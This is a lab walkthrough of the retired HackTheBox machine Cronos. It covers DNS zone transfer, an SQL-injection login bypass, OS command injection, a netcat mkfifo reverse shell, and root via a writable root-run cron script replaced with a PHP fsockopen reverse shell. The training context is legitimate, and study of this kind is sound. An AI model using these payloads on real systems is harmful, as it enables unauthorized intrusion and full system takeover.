Cronos HackTheBox WalkThrough
This is Cronos HackTheBox machine walkthrough and is the
8th machine of our
OSCP like HTB boxes series. In this writeup, I have demonstrated step-by-step how I rooted to Cronos HTB machine. Before starting let us know something about this machine. It is a
Linux machine with IP address
10.10.10.13 and difficulty
medium assigned by its maker.
This machine is currently
retired so you will require
VIP subscription at
hackthebox.eu to access this machine. First of all, connect your PC with VPN and make sure your connectivity with Cronos machine by pinging the IP 10.10.10.13. If all goes correct then start hacking. As usual I started by scanning the machine. Used
nmap [a port scanner] for this task and the result is below-
$ sudo nmap -sC -sV -oN cronos.nmap 10.10.10.13
Nmap revealed that port 22, 53 and 80 are open.
SSH on port
DNS on port
Apache2 web server on port
80 are running. Since apache2 is running on port 80, so there must be some website hosted on this server and it can be accessed by the URL http://10.10.10.13/. Before enumerating, on individual port let us add the domain
cronos.htb, pointing to IP
10.10.10.13 in our
hosts file in case if there will be some
virtual hosting enabled we would get some other website.
Hosts File after Modification
$ sudo cat /etc/hosts
Ongoing to URL http://10.10.10.13/ found
default web page of Apache2 web server. Found nothing interesting on this page so left it here and moved for enumeration at http://cronos.htb . This time found another web page with
Cronos and some links which points to other domains which are outside of
htb scope. So nothing interesting found on this page too. Tried to check the
page source using
CTRL+U, for some
CMS like stuff but got nothing interesting, except some links which try to point that the website is using
Laravel Web Framework. Ran
dirbuster to explore for some files but no unique file found. Left it here and moved forward to enumerate on port 53.
Enumeration on Port 53
DNS service running over. So there can be a chance of
dns zone transfe
r. If zone transfer will be successful we may get some other subdomains of the domain
cronos.htb. So tried to perform dns zone transfer using tool
$ dig axfr @10.10.10.13 cronos.htb
Zone Transfer is successful and we got three new subdomains namely
www.cronos.htb. Added these domains to my
hosts file which is present in
Host File after Modification
$sudo cat /etc/hosts
Ongoing to URL http://www.cronos.htb found the same page as we have on http://cronos.htb. URL http://ns1.cronos.htb has the same default page of the apache2 as http://10.10.10.13. And ongoing to URL http://admin.cronos.htb/ got a login page.
Soon I get a
login page I try to login with credentials
password and if possible I use some other
default credentials. If all these fails then my next attempt is to bypass the login screen using some
SQL injection payload. Did the same this time too and could easily bypassed the login screen using SQL injection. The payload is
' or 1=1 -- - . Simply paste this payload in
UserName field and click on
submit button leaving the
password field blank. This will bypass the login screen.
After login, directed to page
welcome.php. This page has facility to execute two OS commands,
ping. We can abuse this functionality by
concatenating other OS commands with traceroute or ping command using characters like
& , etc. This is called
command Injection. For more info check OWASP tutorial on Command Injection. Tried to execute command by concatenating with character
; (semi colon) and was successful. You can see in the screenshot. Simply, put
126.96.36.199 in the input field and click on
execute button to execute the command.
Checking Command Injection
From above it is confirmed that it is vulnerable to OS command injection attack. Now using this vulnerability we can perform
remote code execution to get reverse shell. Let’s check by the command
;which nc do we have netcat installed on the Cronos machine.
It appears that it is present in directory
/bin/. It’s time to get a reverse shell. Tried to execute some reverse shell payload of nc from pentestmonkey.com and only given payload worked.
;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.5 8080 >/tmp/f
So to get the reverse shell I did the following things.
1. Started netcat listener to listen on port 8080
2. Entered the payload
;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.5 8080 >/tmp/f followed by
188.8.131.52 in the URL field in the web page.
3. Clicked on Execute!.
Getting User Shell
$ nc -nvlp 8080
$ hostname && whoami && id
We got a shell. Let us
upgrade the shell to fully qualified
Linux shell so that we can execute some advanced Linux command.
$ python -c 'import pty;pty.spawn("/bin/bash")'
$ export TERM=xterm-256color
$ CTRL+Z // to background the shell
$ stty raw -echo
$fg //plus press two times enter
Capture User Flag
$ cat /home/noulis/user.txt
To escalate the privilege to root we have to first find a Privilege Escalation Vector using which we can perform privilege escalation. To find PrivEsc vector I ran
linpeas.sh which is a
post exploitation enumeration script. It enumerates all the potential PrivEsc vector that can be used to escalate privilege to root.
Finding PrivEsc Vector
Linpeas found that a
cronjob run by root can be used to escalate privilege. After further enumeration I found that a
php script artisan present inside the directory
/var/www/laravel/ is being executed at every min by the root, which means if root is executing the script then all the content of the file will also be executed by root privilege. And the best part of it is that, this file is modifiable by the user www-data.
So if we replace the content of the file
artisan with our
reverse shell code then we can get our code executed by root and we will get root shell on our netcat listener. I did the same and got root. So here our privilege escalation vector is privilege escalation using
cron script modification run by root.
Getting Root Shell
To get root shell I did the following things.
1. Deleted the file
artisan from the directory
/var/www/laravel/ as user www-data has
rwx permission over the file.
2. Created a new file with the same name as artisan
3. Put content of reverse shell into the file and saved it. The code is given below
$sock=fsockopen("10.10.14.5",1234);exec("/bin/sh -i <&3 >&3 2>&3");
4. Changed the permission to executable
5. Started netcat listener in separate window locally and waited for one min
$nc -nvlp 1234 //In separate window
$ rm artisan
$ vi artisan
$ cat artisan
$ chmod +x artisan
We are root now. Let us grab root flag.
Capture Root Flag
This was how I rooted Cronos HackTheBox machine. Learnt a lot after hunting this box. Hope you guys have also learnt some new things from this box. Thanks for reading this writeup. Write your experience in the comment section. For any suggestion and query related to walkthrough feel free to write us at [email protected].
Next upcoming retired machine walkthrough is Grandpa.